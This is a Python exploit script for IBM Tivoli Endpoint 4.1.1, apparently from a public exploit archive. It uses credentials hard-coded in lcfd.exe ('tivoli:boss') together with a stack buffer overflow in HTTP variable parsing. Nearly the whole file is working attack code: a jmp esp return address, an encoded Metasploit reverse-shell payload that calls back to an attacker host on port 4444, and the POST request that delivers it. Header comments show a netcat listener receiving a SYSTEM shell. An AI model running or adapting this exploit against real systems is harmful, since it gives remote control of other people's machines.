IBM Tivoli Endpoint 4.1.1 Buffer Overflow / Hard-Coded Credentials

`#!/usr/bin/python  
# tiv-sys.py  
# IBM Tivoli Endpoint 4.1.1 Remote SYSTEM Exploit  
# Jeremy Brown [0xjbrown41-gmail-com]  
# June 2011  
#  
# Discovered by: Brian Adeloye of Tenable Network Security  
#  
# This exploit makes use of two vulnerabilities:  
#  
# 1) Base64 authentication credentials hard-coded in lcfd.exe  
# 2) Stack-based buffer overflow when parsing HTTP variable values  
#  
# Tested on Tivoli Endpoint 4.1.1-LCF-0048 running on Windows XP SP3  
#  
# $ python tiv-sys.py 192.168.0.188  
# .....  
# $ nc -v -l 4444  
# Connection from 192.168.0.188 port 4444 [tcp/*] accepted  
# Microsoft Windows XP [Version 5.1.2600]  
# (C) Copyright 1985-2001 Microsoft Corp.  
#  
# C:\Program Files\Tivoli\lcf\dat\1>  
#  
# References:  
#  
# http://www.zerodayinitiative.com/advisories/ZDI-11-169/  
# https://www-304.ibm.com/support/docview.wss?uid=swg21499146  
#  
  
import sys  
import struct  
import socket  
import httplib  
import urllib  
  
port=9495  
  
ret=0x7C96BF33 # jmp esp @ user32.dll  
junk="B"*256  
  
# windows/shell_reverse_tcp - 333 bytes  
# http://www.metasploit.com  
# Encoder: x86/countdown  
# LHOST=192.168.0.198, LPORT=4444, ReverseConnectRetries=5,   
# EXITFUNC=thread, InitialAutoRunScript=, AutoRunScript=  
payload=(  
"\x2b\xc9\x66\xb9\x39\x01\xe8\xff\xff\xff\xff\xc1\x5e\x30"  
"\x4c\x0e\x07\xe2\xfa\xfd\xea\x8a\x04\x05\x06\x67\x81\xec"  
"\x3b\xd9\x68\x86\x5c\x3f\x9b\x43\x1e\x98\x46\x01\x9d\x65"  
"\x30\x16\xad\x51\x3a\x2c\xe1\x2e\xe0\x8d\x1e\x42\x58\x27"  
"\x0a\x07\xe9\xe6\x27\x2a\xeb\xcf\xde\x7d\x67\xba\x60\x23"  
"\xbf\x77\x0a\x36\xe8\xb2\x7a\x43\xb9\xfd\x4a\x75\x41\x91"  
"\x12\xc8\x0c\x5d\xcd\x1f\x68\x48\x99\xa8\x70\x04\xc5\x7b"  
"\xdb\x50\x84\x62\xab\x64\x96\xfb\x99\x96\x57\x5a\x9b\x65"  
"\xbe\x2a\x94\x62\x1f\x9b\x5f\x18\x42\x12\x8a\x31\xe1\x33"  
"\x48\x6c\xbd\x09\xfb\x7d\x39\xf8\x2c\x69\x77\xa4\xf3\x7d"  
"\xf1\x7a\xac\xf4\x3a\x5b\xa4\xda\xd9\xe2\xdd\xdf\xd7\x78"  
"\x68\xd1\xd5\xd1\x07\x9f\x65\x09\xcd\xf9\xa1\xa1\x94\x95"  
"\xfe\xe0\xeb\xab\xc5\xcf\xf4\xd1\xe9\xb9\xa7\x5e\x77\x1b"  
"\x34\xa4\xa6\xa7\x81\x6d\xfe\xfb\xc4\x84\x2e\xc4\xb0\x4e"  
"\x67\xe3\xe4\xe5\xe6\xf7\xe8\xf9\xea\xd3\x56\xb2\x61\x5f"  
"\x3f\x14\x4b\x04\xac\x05\x6e\xc7\x0e\xa1\xc8\xcb\xdd\x91"  
"\x47\x29\xba\xc1\x84\x84\xbc\x4c\x73\xa3\xb9\x26\x0f\xb3"  
"\xbf\xb0\xba\xdf\x69\x02\xb5\xb4\xb3\xd4\x10\x8d\xfa\xb0"  
"\xbc\x09\x11\x8b\x29\xab\xd4\xcd\xf3\xf2\x79\xb1\xd2\xe7"  
"\x3e\xf9\xbe\xaf\xac\xab\xa8\xa9\x46\x57\x4c\x55\x52\x56"  
"\x50\x6f\x71\xc5\x35\x8d\xf3\xd8\x87\xef\x5e\x47\x54\xec"  
"\x24\x7d\x1e\x90\x05\x79\xe5\xce\xa7\xfd\x03\x35\x2a\x49"  
"\x84\xb6\x99\xb8\xd9\xf2\x14\x2f\x56\x21\xac\xd6\xce\x5a"  
"\x35\x8a\x75\x20\x46\x5a\x5c\x37\x6b\xc6\xef")  
  
if len(sys.argv)<2:  
print "Usage: "+sys.argv[0]+" <target> [port]"  
sys.exit(0)  
  
target=sys.argv[1]  
if len(sys.argv)==3:  
port=int(sys.argv[2])  
  
retaddr=struct.pack("<L",ret)  
  
data=urllib.urlencode({"test":junk+retaddr+payload})  
size=5+len(junk)+len(retaddr)+len(payload) # 'test=' = 5 (also works with just '=')  
hdrs={"Host":"pw.n","Content-Length":size,"Authorization":"Basic dGl2b2xpOmJvc3M="} # tivoli:boss  
  
conn=httplib.HTTPConnection(target,port)  
conn.request("POST","/addr",data,hdrs)  
conn.close()  
`